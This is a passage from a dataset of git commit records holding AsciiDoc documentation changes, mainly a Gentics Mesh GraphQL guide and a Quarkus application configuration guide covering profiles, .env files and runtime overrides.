{product-title}\ninclude::modules\/technology-preview.adoc[leveloffset=+1]\n\ninclude::modules\/helm-understanding-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-a-helm-chart-on-an-openshift-cluster.adoc[leveloffset=+1]\n\ninclude::modules\/helm-creating-a-custom-helm-chart-on-openshift.adoc[leveloffset=+1]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ff6d064aa90c9cf14b9ddbc49dd19203351bda7","subject":"BZ1891361: Added note block about vSphere volume is not deleted after the cluster is destroyed","message":"BZ1891361: Added note block about vSphere volume is not deleted after the cluster is destroyed\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"installing\/installing_vsphere\/uninstalling-cluster-vsphere-installer-provisioned.adoc","new_file":"installing\/installing_vsphere\/uninstalling-cluster-vsphere-installer-provisioned.adoc","new_contents":":_content-type: ASSEMBLY\n[id=\"uninstalling-cluster-vsphere-installer-provisioned\"]\n= 
Uninstalling a cluster on vSphere that uses installer-provisioned infrastructure\ninclude::_attributes\/common-attributes.adoc[]\n:context: uninstalling-cluster-vsphere-installer-provisioned\n\ntoc::[]\n\nYou can remove a cluster that you deployed in your VMware vSphere instance by using installer-provisioned infrastructure.\n\n[NOTE]\n====\nWhen you run the `openshift-install destroy cluster` command to uninstall {product-title}, vSphere volumes are not automatically deleted. The cluster administrator must manually find the vSphere volumes and delete them.\n====\n\ninclude::modules\/installation-uninstall-clouds.adoc[leveloffset=+1]\n","old_contents":":_content-type: ASSEMBLY\n[id=\"uninstalling-cluster-vsphere-installer-provisioned\"]\n= Uninstalling a cluster on vSphere that uses installer-provisioned infrastructure\ninclude::_attributes\/common-attributes.adoc[]\n:context: uninstalling-cluster-vsphere-installer-provisioned\n\ntoc::[]\n\nYou can remove a cluster that you deployed in your VMware vSphere instance by using installer-provisioned infrastructure.\n\ninclude::modules\/installation-uninstall-clouds.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94fd1a1c189f609f66c0177ff5d7c9dea1adcf66","subject":"fixed typo","message":"fixed typo\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/graphql.asciidoc","new_file":"doc\/src\/main\/docs\/graphql.asciidoc","new_contents":"---\ntitle: GraphQL\n---\n\n:icons: font\n:source-highlighter: prettify\n\nGentics Mesh is also able to process http:\/\/graphql.org\/[GraphQL] queries. You can use GraphQL to directly specify what fields should be retrieved and retrieve deeply nested data sets.\nInternally, Gentics Mesh will resolve your query and traverse your content graph to fetch only the data you specified.\n\nThe GraphQL API can thus be used to prepare a single request which returns all data needed to render a specific page. \n\nPossible use cases are:\n\n* Loading multiple nodes using the webroot path.\n* Generating a custom navigation which only includes the information you need.\n* Invoking multiple search requests to find a set of specific nodes.\n* Resolving links within the content of a node.\n* Loading users, roles, groups\n* Loading tags, tag families, schema and microschema information\n\n== Live Examples\n\nIf you want to learn more about the GraphQL syntax, take a look at the http:\/\/graphql.org\/learn\/queries\/[official documentation].\n\n=== Loading current user\n\ninclude::content\/docs\/examples\/graphql\/user-tiny-query[]\n\n=== Loading basic fields of a node \n\ninclude::content\/docs\/examples\/graphql\/node-field-query[]\n\n=== Loading a node via uuid\n\ninclude::content\/docs\/examples\/graphql\/node-uuid-query[]\n\n=== Loading referenced fields of a node\n\nNodes can be linked together in various ways. One way is the regular parent-child relationship. Another way is by using node fields. The demo data contains vehicles, each of which is linked to a vehicle image. 
In order to present the vehicle, we also need to retrieve the image path and other information.\n\ninclude::content\/docs\/examples\/graphql\/node-reference-query[]\n\n[[search]]\n=== Invoking a search query to find specific nodes\n\nThe search query is an escaped JSON object which represents a regular https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/2.4\/_executing_searches.html[Elasticsearch query].\n\ninclude::content\/docs\/examples\/graphql\/node-search-query[]\n\n+++\n<a href=\"https:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/#query=query%20stuff(%24esQuery%3A%20String)%20%7B%0A%20%20nodes(query%3A%20%24esQuery)%20%7B%0A%20%20%20%20elements%20%7B%0A%20%20%20%20%20%20uuid%0A%20%20%20%20%20%20fields%20%7B%0A%20%20%20%20%20%20%20%20...%20on%20vehicle%20%7B%0A%20%20%20%20%20%20%20%20%20%20slug%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20totalCount%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22esQuery%22%3A%20%20%22%7B%5C%22query%5C%22%3A%7B%5C%22query_string%5C%22%3A%7B%5C%22query%5C%22%3A%5C%22car%5C%22%7D%7D%7D%22%0A%7D&operationName=stuff\" target=\"_blank\">Example using variables<\/a>\n+++\n\n=== Using pagination\n\nSimilar to the REST API, a value-based pagination system is implemented.\n\ninclude::content\/docs\/examples\/graphql\/node-page-query[]\n\n=== Multilanguage support\n\nThe node will automatically be loaded in the language which matches up with the provided webroot path. A webroot path which points to an English node will yield the English content. Subsequently loading a node using the German path will yield the German content. It is important to note that Gentics Mesh tries to stick to a language as much as possible. Loading additional referenced nodes of a German node via either the children or a node field will return the German content if such content can be found. The fallback to the configured default language will be applied if no other matching content can be found. Null will be returned if this also fails.\n\nIt is possible to load a found node in a different language using the `node` field as shown in the example.\n\ninclude::content\/docs\/examples\/graphql\/node-multilang-query[]\n\n== Filtering\nAny time a node list is requested, you can provide a filter object as a parameter to narrow down the result.\n\nHere are a few examples:\n\n=== Loading nodes from a specific schema\nThe `SchemaFilter` matches nodes with a specific schema name.\ninclude::content\/docs\/examples\/graphql\/filtering\/root-folders[]\n\n=== Filter nodes with regular expressions\nThe `StringFilter` offers various ways to filter strings. One example is regular expressions.\nIn this example we get all nodes with the schema `vehicle`. We check if their name field ends with a number.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-regex[]\n\n=== Combining different filters\nCombine multiple filters to further narrow down your results. One example is the `OrFilter`.\nWe get the same nodes as in the previous example. 
Additionally, we also get all vehicles that have a price lower than 200.000.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-or[]\n\n=== Filtering limitations\nWhen filtering by fields of a node, it is currently only possible to filter by fields of the following types:\n\n* `string`\n* `html`\n* `number`\n* `date`\n* `boolean`\n\n.A note on GraphiQL\n[TIP]\nEdit the above examples and experiment with the API.\nUse the GraphiQL autocompletion (press `ctrl`+`space` while typing your query) to see what options are available.\nCheck the documentation explorer (in the top-right corner) to find out more details.\n\n.Try it in your own installation\n[TIP]\nYour instance of Gentics Mesh comes with the <<_graphiql_browser>> as well.\n\n=== Comparison to Elasticsearch\nMany tasks can be done by both the search and the filtering feature. Here are a few tips that help you decide which technology is suited best for your needs:\n\n* GraphQL filtering is independent of Elasticsearch. If you don't want to use Elasticsearch, GraphQL filtering is still available.\n* GraphQL filtering is faster when dealing with small datasets. There is less overhead compared to Elasticsearch. GraphQL filtering iterates over the source set of elements and applies the filter until enough nodes have been found for the response.\n* Elasticsearch is faster when dealing with large datasets, because it uses an index to access its documents.\n* Elasticsearch is better suited for full text search queries from an end user because you can precisely tune the index to your requirements.\n\n== GraphiQL Browser\n\nWe have integrated the interactive https:\/\/github.com\/graphql\/graphiql[GraphiQL]footnote:[https:\/\/github.com\/graphql\/graphiql[GraphiQL] is owned and developed by Facebook Inc. Usage is subject to the https:\/\/github.com\/gentics\/mesh\/blob\/dev\/verticles\/graphql\/src\/main\/resources\/graphiql\/LICENSE[LICENSE AGREEMENT For GraphiQL software].] browser into Gentics Mesh so you can easily play with the API.\n\n.Try the example\n[TIP]\nhttps:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/[Live Demo]\n\nAlternatively, you can download Gentics Mesh and test the API locally.\nOnce authenticated you can access the interactive GraphiQL browser at ```\/api\/v1\/:projectName\/graphql\/browser\/``` .\n\nNOTE: The GraphiQL browser currently does not support the `branch` or `version` query parameter.\n\n== Limitations\n\n* At the moment, the GraphQL API can only be used for read-only operations. Modifying data via mutations is currently not supported.\n* GraphQL queries are restricted to a specific project. It is not possible to query data across multiple projects.\n* GraphQL queries are restricted to a specific project branch. The scope of the branch can be changed by adding the `?branch` query parameter.\n","old_contents":"---\ntitle: GraphQL\n---\n\n:icons: font\n:source-highlighter: prettify\n\nGentics Mesh is also able to process http:\/\/graphql.org\/[GraphQL] queries. You can use GraphQL to directly specify what fields should be retrieved and retrieve deeply nested data sets.\nInternally, Gentics Mesh will resolve your query and traverse your content graph to fetch only the data you specified.\n\nThe GraphQL API can thus be used to prepare a single request which returns all data needed to render a specific page. 
\n\nPossible use cases are:\n\n* Loading multiple nodes using the webroot path.\n* Generating a custom navigation which only includes the information you need.\n* Invoking multiple search requests to find a set of specific nodes.\n* Resolve links within the content of a node.\n* Load users, roles, groups\n* Load tags, tag families, schema and microschema information\n\n== Live Examples\n\nIf you want to learn more about the http:\/\/graphql.org\/learn\/queries\/[GraphQL syntax take a look at the good documentation].\n\n=== Loading current user\n\ninclude::content\/docs\/examples\/graphql\/user-tiny-query[]\n\n=== Loading basic fields of a node \n\ninclude::content\/docs\/examples\/graphql\/node-field-query[]\n\n=== Loading a node via uuid\n\ninclude::content\/docs\/examples\/graphql\/node-uuid-query[]\n\n=== Loading referenced fields of a node\n\nNodes can be linked together in various way. One way is the regular parent-child relationship. Another way is by using node fields. The demo data contains vehicles which each is linked to a vehicle image. In order to present the vehicle we also need to retrieve the image path and other information.\n\ninclude::content\/docs\/examples\/graphql\/node-reference-query[]\n\n[[search]]\n=== Invoking a search query to find specific nodes\n\nThe search query is an escaped JSON object which represents the a regular https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/2.4\/_executing_searches.html[Elasticsearch query].\n\ninclude::content\/docs\/examples\/graphql\/node-search-query[]\n\n+++\n<a href=\"https:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/#query=query%20stuff(%24esQuery%3A%20String)%20%7B%0A%20%20nodes(query%3A%20%24esQuery)%20%7B%0A%20%20%20%20elements%20%7B%0A%20%20%20%20%20%20uuid%0A%20%20%20%20%20%20fields%20%7B%0A%20%20%20%20%20%20%20%20...%20on%20vehicle%20%7B%0A%20%20%20%20%20%20%20%20%20%20slug%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20totalCount%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22esQuery%22%3A%20%20%22%7B%5C%22query%5C%22%3A%7B%5C%22query_string%5C%22%3A%7B%5C%22query%5C%22%3A%5C%22car%5C%22%7D%7D%7D%22%0A%7D&operationName=stuff\" target=\"_blank\">Example using variables<\/a>\n+++\n\n=== Using pagination\n\nSimilar to the REST API a value based pagination system is implemented. \n\ninclude::content\/docs\/examples\/graphql\/node-page-query[]\n\n=== Multilanguage support\n\nThe node will automatically be loaded in the language which matches up with the provided webroot path. A webroot path which points to an english node will yield the english content. Subsequent loading a node using the german path will yield the german content. It is important to node that Gentics Mesh tries to stick to a language as much as possible. Loading additional referenced nodes of an german node via either the children or a node field will return the german content if such content could be found. The fallback to the configured default language will be applied if no other matching content found be found. 
Null will be returned if this also fails.\n\nIt is possible to load a found node in a different language using the `node` field as shown in the example.\n\ninclude::content\/docs\/examples\/graphql\/node-multilang-query[]\n\n== Filtering\nAny time a node list is requested, you can provide a filter object as a parameter to narrow down the result.\n\nHere are a few examples:\n\n=== Loading nodes from a specific schema\nThe `SchemaFilter` matches nodes with a specific schema name.\ninclude::content\/docs\/examples\/graphql\/filtering\/root-folders[]\n\n=== Filter nodes with regular expressions\nThe `StringFilter` offers various ways to filter strings. One example is regular expressions.\nIn this example we get all nodes with the schema `vehicle`. We check if their name field ends with a number.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-regex[]\n\n=== Combining different filters\nCombine multiple filters to further narrow down your results. One example is the `OrFilter`.\nWe get the same nodes as in the previous example. Additionally we also get all vehicles that have a price lower than 200.000.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-or[]\n\n=== Filtering limitations\nWhen filtering by fields of a node, it is currently only possible to filter by fields of the following types:\n\n* `string`\n* `html`\n* `number`\n* `date`\n* `boolean`\n\n.A note on GraphiQL\n[TIP]\nEdit the above examples and experiment with the API.\nUse the GraphiQL autocompletion (press `ctrl`+`space` while typing your query) to see what options are available.\nCheck the documentation explorer (in the top-right corner) to find out more details.\n\n.Try it in your own installation\n[TIP]\nYour instance of Gentics Mesh comes with the <<_graphiql_browser>> as well.\n\n=== Comparison to Elasticsearch\nMany tasks can be done by both the search and the filtering feature. Here are a few tips that help you decide which technology is suited best for your needs:\n\n* GraphQL filtering is independent of Elasticsearch. If you don't want to use Elasticsearch, GraphQL filtering is still available.\n* GraphQL filtering is faster when dealing with small datasets. There is less overhead compared to Elasticsearch. GraphQL filtering iterates over the source set of elements and applies the filter until enough nodes have been found for the response.\n* Elasticsearch is faster when dealing with large datasets, because it uses an index to access its documents.\n* Elasticsearch is better suited for full text search queries from an end user because you can precisely tune the index to your requirements.\n\n== GraphiQL Browser\n\nWe have integrated the interactive https:\/\/github.com\/graphql\/graphiql[GraphiQL]footnote:[https:\/\/github.com\/graphql\/graphiql[GraphiQL] is owned and developed by Facebook Inc. Usage is subject to the https:\/\/github.com\/gentics\/mesh\/blob\/dev\/verticles\/graphql\/src\/main\/resources\/graphiql\/LICENSE[LICENSE AGREEMENT For GraphiQL software].] 
browser into Gentics Mesh so you can easily play with the API.\n\n.Try the example\n[TIP]\nhttps:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/[Live Demo]\n\nAlternatively, you can download Gentics Mesh and test the API locally.\nOnce authenticated, you can access the interactive GraphiQL browser at `\/api\/v1\/:projectName\/graphql\/browser\/`.\n\nNOTE: The GraphiQL browser currently does not support the `branch` or `version` query parameter.\n\n== Limitations\n\n* At the moment, the GraphQL API can only be used for read-only operations. Modifying data via mutations is not yet supported.\n* GraphQL queries are restricted to a specific project. It is not possible to query data across multiple projects.\n* GraphQL queries are restricted to a specific project branch. The scope of the branch can be changed by adding the `?branch` query parameter.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"569487315dce801c972cd5b95048623191ecf447","subject":"Extend Guide on .env Profiles","message":"Extend Guide on .env Profiles\n\n- Note .env Priority to application.properties\n- Add Example of .env File With Profile\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/config.adoc","new_file":"docs\/src\/main\/asciidoc\/config.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Configuring Your Application\n\ninclude::.\/attributes.adoc[]\n\nHardcoded values in your code are a _no go_ (even if we all did it at some point ;-)).\nIn this guide, we learn how to configure your application.\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* between 5 and 10 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven {maven-version}\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `config-quickstart` {quickstarts-tree-url}\/config-quickstart[directory].\n\n== Creating the Maven project\n\nFirst, we need a new project. 
Create a new project with the following command:\n\n[source,shell,subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=config-quickstart \\\n -DclassName=\"org.acme.config.GreetingResource\" \\\n -Dpath=\"\/greeting\"\ncd config-quickstart\n----\n\nIt generates:\n\n* the Maven structure\n* a landing page accessible on `http:\/\/localhost:8080`\n* example `Dockerfile` files for both `native` and `jvm` modes\n* the application configuration file\n* an `org.acme.config.GreetingResource` resource\n* an associated test\n\n== Injecting configuration value\n\nQuarkus uses https:\/\/microprofile.io\/project\/eclipse\/microprofile-config[MicroProfile Config] to inject the configuration in the application.\nThe injection uses the `@ConfigProperty` annotation.\n\n[source,java]\n----\n@ConfigProperty(name = \"greeting.message\")\nString message;\n----\n\nNOTE: When injecting a configured value, you can use `@Inject @ConfigProperty` or just `@ConfigProperty`.\nThe `@Inject` annotation is not necessary for members annotated with `@ConfigProperty`, a behavior which differs from https:\/\/microprofile.io\/project\/eclipse\/microprofile-config[MicroProfile Config]\n\nEdit the `org.acme.config.GreetingResource`, and introduce the following configuration properties:\n\n[source,java]\n----\n@ConfigProperty(name = \"greeting.message\") <1>\nString message;\n\n@ConfigProperty(name = \"greeting.suffix\", defaultValue=\"!\") <2>\nString suffix;\n\n@ConfigProperty(name = \"greeting.name\")\nOptional<String> name; <3>\n----\n<1> If you do not provide a value for this property, the application startup fails with `javax.enterprise.inject.spi.DeploymentException: No config value of type [class java.lang.String] exists for: greeting.message`.\n<2> The default value is injected if the configuration does not provide a value for `greeting.suffix`.\n<3> This property is optional - an empty `Optional` is injected if the configuration does not provide a value for `greeting.name`.\n\nNow, modify the `hello` method to use the injected properties:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic String hello() {\n return message + \" \" + name.orElse(\"world\") + suffix;\n}\n----\n\n\n== Create the configuration\n\nBy default, Quarkus reads `application.properties`.\nEdit the `src\/main\/resources\/application.properties` with the following content:\n\n[source,shell]\n----\n# Your configuration properties\ngreeting.message = hello\ngreeting.name = quarkus\n----\n\nOnce set, check the application with:\n\n[source,shell]\n----\n$ curl http:\/\/localhost:8080\/greeting\nhello quarkus!\n----\n\nTIP: If the application requires configuration values and these values are not set, an error is thrown.\nSo you can quickly know when your configuration is complete.\n\n== Update the test\n\nWe also need to update the functional test to reflect the changes made to the endpoint.\nEdit the `src\/test\/java\/org\/acme\/config\/GreetingResourceTest.java` file and change the content of the `testHelloEndpoint` method to:\n\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.junit.jupiter.api.Test;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@QuarkusTest\npublic class GreetingResourceTest {\n\n @Test\n public void testHelloEndpoint() {\n given()\n .when().get(\"\/greeting\")\n .then()\n .statusCode(200)\n .body(is(\"hello 
quarkus!\")); \/\/ Modified line\n }\n\n}\n----\n\n== Package and run the application\n\nRun the application with: `.\/mvnw compile quarkus:dev`.\nOpen your browser to http:\/\/localhost:8080\/greeting.\n\nChanging the configuration file is immediately reflected.\nYou can add the `greeting.suffix`, remove the other properties, change the values, etc.\n\nAs usual, the application can be packaged using `.\/mvnw clean package` and executed using the `-runner.jar` file.\nYou can also generate the native executable with `.\/mvnw clean package -Pnative`.\n\n== Programmatically access the configuration\n\nYou can access the configuration programmatically.\nIt can be handy to achieve dynamic lookup, or retrieve configured values from classes that are neither CDI beans or JAX-RS resources.\n\nYou can access the configuration programmatically using `org.eclipse.microprofile.config.ConfigProvider.getConfig()` such as in:\n\n[source,java]\n----\nString databaseName = ConfigProvider.getConfig().getValue(\"database.name\", String.class);\nOptional<String> maybeDatabaseName = ConfigProvider.getConfig().getOptionalValue(\"database.name\", String.class);\n----\n\n== Using @ConfigProperties\n\nAs an alternative to injecting multiple related configuration values in the way that was shown in the previous example,\nusers can also use the `@io.quarkus.arc.config.ConfigProperties` annotation to group these properties together.\n\nFor the greeting properties above, a `GreetingConfiguration` class could be created like so:\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.arc.config.ConfigProperties;\nimport java.util.Optional;\n\n@ConfigProperties(prefix = \"greeting\") <1>\npublic class GreetingConfiguration {\n\n private String message;\n private String suffix = \"!\"; <2>\n private Optional<String> name;\n\n public String getMessage() {\n return message;\n }\n\n public void setMessage(String message) {\n this.message = message;\n }\n\n public String getSuffix() {\n return suffix;\n }\n\n public void setSuffix(String suffix) {\n this.suffix = suffix;\n }\n\n public Optional<String> getName() {\n return name;\n }\n\n public void setName(Optional<String> name) {\n this.name = name;\n }\n}\n----\n<1> `prefix` is optional. If not set then the prefix to be used will be determined by the class name. In this case it would still be `greeting` (since the `Configuration` suffix is removed). 
\n\nThis class could then be injected into the `GreetingResource` using the familiar CDI `@Inject` annotation like so:\n\n[source,java]\n----\n@Inject\nGreetingConfiguration greetingConfiguration;\n----\n\nAnother alternative style provided by Quarkus is to create `GreetingConfiguration` as an interface like so:\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.arc.config.ConfigProperties;\nimport org.eclipse.microprofile.config.inject.ConfigProperty;\nimport java.util.Optional;\n\n@ConfigProperties(prefix = \"greeting\")\npublic interface GreetingConfiguration {\n\n @ConfigProperty(name = \"message\") <1>\n String message();\n\n @ConfigProperty(defaultValue = \"!\")\n String getSuffix(); <2>\n\n Optional<String> getName(); <3>\n}\n----\n<1> The `@ConfigProperty` annotation is needed because the name of the configuration property that the method corresponds to doesn't follow the getter method naming conventions.\n<2> In this case, since the `name` attribute was not set, the corresponding property will be `greeting.suffix`.\n<3> It is unnecessary to specify the `@ConfigProperty` annotation because the method name follows the getter method naming conventions (`greeting.name` being the corresponding property) and no default value is needed.\n\nWhen using `@ConfigProperties` on a class or an interface, if the value of one of its fields is not provided, the application startup will fail and a `javax.enterprise.inject.spi.DeploymentException` indicating the missing value information will be thrown.\nThis does not apply to `Optional` fields and fields with a default value.\n\n=== Additional notes on @ConfigProperties\n\nWhen using a regular class annotated with `@ConfigProperties`, the class doesn't necessarily have to declare getters and setters.\nHaving simple public non-final fields is valid as well.
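\n\nFor instance, a field-only sketch of the earlier class-based example could be trimmed down to this:\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.arc.config.ConfigProperties;\nimport java.util.Optional;\n\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n \/\/ Plain public non-final fields work; no getters or setters are required.\n public String message;\n public String suffix = \"!\";\n public Optional<String> name;\n}\n----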
\n\nFurthermore, the configuration classes support nested object configuration. Suppose there was a need to have an extra layer\nof greeting configuration named `hidden` that would contain a few fields. This could be achieved like so:\n\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n public String message;\n public String suffix = \"!\";\n public Optional<String> name;\n public HiddenConfig hidden; <1>\n\n public static class HiddenConfig {\n public Integer prizeAmount;\n public List<String> recipients;\n }\n}\n----\n<1> The name of the field (not the class name) will determine the name of the properties that are bound to the object.\n\nSetting the properties would occur in the normal manner, for example in `application.properties` one could have:\n\n[source,properties]\n----\ngreeting.message = hello\ngreeting.name = quarkus\ngreeting.hidden.prize-amount=10\ngreeting.hidden.recipients=Jane,John\n----\n\nFurthermore, classes annotated with `@ConfigProperties` can be annotated with Bean Validation annotations similar to the following example:\n\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n @Size(min = 20)\n public String message;\n public String suffix = \"!\";\n\n}\n----\n\nWARNING: For validation to work, the `quarkus-hibernate-validator` extension needs to be present.\n\nIf the validation fails with the given configuration, the application will fail to start and indicate the corresponding validation errors in the log.\n\nIn the case of an interface being annotated with `@ConfigProperties`, the interface is allowed to extend other interfaces, and methods from\nthe entire interface hierarchy are used to bind properties.\n\n=== Using the same ConfigProperties with different prefixes\n\nQuarkus also supports the use of the same `@ConfigProperties` object with different prefixes for each injection point using the `@io.quarkus.arc.config.ConfigPrefix` annotation.\nSay for example that `GreetingConfiguration` from above needs to be used for both the `greeting` prefix and the `other` prefix.\nIn that case the code would look like so:\n\n`GreetingConfiguration.java`\n[source,java]\n----\n@ConfigProperties(prefix = \"greeting\")\npublic class GreetingConfiguration {\n\n @Size(min = 20)\n public String message;\n public String suffix = \"!\";\n\n}\n----\n\n`SomeBean.java`\n[source,java]\n----\n@ApplicationScoped\npublic class SomeBean {\n\n @Inject <1>\n GreetingConfiguration greetingConfiguration;\n\n @ConfigPrefix(\"other\") <2>\n GreetingConfiguration otherConfiguration;\n\n}\n----\n<1> At this injection point `greetingConfiguration` will use the `greeting` prefix since that is what has been defined on `@ConfigProperties`.\n<2> At this injection point `otherConfiguration` will use the `other` prefix from `@ConfigPrefix` instead of the `greeting` prefix. Notice that in this case `@Inject` is not required.\n\n== Configuring Quarkus\n\nQuarkus itself is configured via the same mechanism as your application. Quarkus reserves the `quarkus.` namespace\nfor its own configuration. 
For example, to configure the HTTP server port you can set `quarkus.http.port` in\n`application.properties`.\n\n[IMPORTANT]\n====\nAs mentioned above, properties prefixed with `quarkus.` are effectively reserved for configuring Quarkus itself and\ntherefore `quarkus.` should **never** be used as a prefix for application-specific properties.\n\nIn the previous examples, using `quarkus.message` instead of `greeting.message` would result in unexpected behavior.\n====\n\n=== List of all configuration properties\n\nAll the Quarkus configuration properties are link:all-config[documented and searchable].\n\n=== Generating configuration for your application\n\nIt is also possible to generate an example `application.properties` with all known configuration properties, to make\nit easy to see what Quarkus configuration options are available. To do this, run:\n\n[source,shell]\n--\n.\/mvnw quarkus:generate-config\n--\n\nThis will create a `src\/main\/resources\/application.properties.example` file that contains all the config options\nexposed via the extensions you currently have installed. These options are commented out, and have their default value\nwhen applicable. For example this HTTP port config entry will appear as:\n\n\n[source,properties]\n--\n#\n# The HTTP port\n#\n#quarkus.http.port=8080\n--\n\nRather than generating an example config file, you can also add these to your actual config file by setting the `-Dfile`\nparameter:\n\n[source,shell]\n--\n.\/mvnw quarkus:generate-config -Dfile=application.properties\n--\n\nIf a config option is already present (commented or not) it will not be added, so it is safe to run this after\nadding an additional extension to see what additional options have been added.\n\n== Overriding properties at runtime\n\nQuarkus does much of its configuration and bootstrap at build time.\nMost properties will then be read and set during the build time step.\nTo change them, make sure to repackage your application.\n\n[source,shell]\n--\n.\/mvnw clean package\n--\n\nExtensions do define _some_ properties as overridable at runtime.\nA canonical example is the database URL, username and password, which are only known in your target environment.\nThis is a tradeoff as the more runtime properties are available, the less build time prework Quarkus can do. The list of runtime properties is therefore lean.\n\nYou can override these runtime properties with the following mechanisms (in decreasing priority; a short precedence sketch follows the list):\n\n1. using system properties:\n * for a runner jar: `java -Dquarkus.datasource.password=youshallnotpass -jar target\/myapp-runner.jar`\n * for a native executable: `.\/target\/myapp-runner -Dquarkus.datasource.password=youshallnotpass`\n2. using environment variables:\n * for a runner jar: `export QUARKUS_DATASOURCE_PASSWORD=youshallnotpass ; java -jar target\/myapp-runner.jar`\n * for a native executable: `export QUARKUS_DATASOURCE_PASSWORD=youshallnotpass ; .\/target\/myapp-runner`\n3. using an environment file named `.env` placed in the current working directory containing the line `QUARKUS_DATASOURCE_PASSWORD=youshallnotpass` (for dev mode, this file can be placed in the root of the project, but it is advised not to check it into version control)\n4. using a configuration file placed in `$PWD\/config\/application.properties`\n * By placing an `application.properties` file inside a directory named `config` which resides in the directory where the application runs, any runtime properties defined\nin that file will override the default configuration. Furthermore, any runtime properties added to this file that were not part of the original `application.properties` file\n_will also_ be taken into account.\n * This works in the same way for the runner jar and the native executable.
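\n\nAs a quick illustration of the precedence order, the following sketch (the jar name and values are the illustrative ones used above) sets the same runtime property through two mechanisms; the system property, being higher in the list, wins:\n\n[source,shell]\n--\nexport QUARKUS_DATASOURCE_PASSWORD=youshallnotpass\n# The system property takes precedence over the environment variable:\njava -Dquarkus.datasource.password=evenmoresecret -jar target\/myapp-runner.jar\n--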
\n\nNOTE: Environment variable names follow the conversion rules of link:https:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#default-configsources[Eclipse MicroProfile].\n\nNOTE: An environment variable without a configuration profile in the `.env` file overrides all profile-specific values of the corresponding property in `application.properties`, e.g. `%test.application.value` is overridden by `APPLICATION_VALUE` in the `.env` file.\n\nNOTE: The `config\/application.properties` feature is available in development mode as well. To make use of it, `config\/application.properties` needs to be placed inside the build tool's output directory (`target` for Maven and `build\/classes\/java\/main` for Gradle).\nKeep in mind however that any cleaning operation from the build tool like `mvn clean` or `gradle clean` will remove the `config` directory as well.\n\n=== Configuration Profiles\n\nQuarkus supports the notion of configuration profiles. These allow you to have multiple configurations in the same file and\nselect between them via a profile name.\n\nThe syntax for this is `%{profile}.config.key=value`. For example, if I have the following:\n\n[source,properties]\n----\nquarkus.http.port=9090\n%dev.quarkus.http.port=8181\n----\n\nThe Quarkus HTTP port will be 9090, unless the `dev` profile is active, in which case it will be 8181.\n\nTo use profiles in the `.env` file, follow the `_{PROFILE}_CONFIG_KEY=value` pattern. An equivalent of the above example in the `.env` file would be:\n\n[source,.env]\n----\nQUARKUS_HTTP_PORT=9090\n_DEV_QUARKUS_HTTP_PORT=8181\n----\n\nBy default, Quarkus has three profiles, although it is possible to use as many as you like. The default profiles are:\n\n* *dev* - Activated when in development mode (i.e. `quarkus:dev`)\n* *test* - Activated when running tests\n* *prod* - The default profile when not running in development or test mode\n\nThere are two ways to set a custom profile, either via the `quarkus.profile` system property or the `QUARKUS_PROFILE`\nenvironment variable. If both are set, the system property takes precedence. Note that it is not necessary to\ndefine the names of these profiles anywhere; all that is necessary is to create a config property with the profile\nname, and then set the current profile to that name. For example, if I want a `staging` profile with a different HTTP port,\nI can add the following to `application.properties`:\n\n[source,properties]\n----\nquarkus.http.port=9090\n%staging.quarkus.http.port=9999\n----\n\nAnd then set the 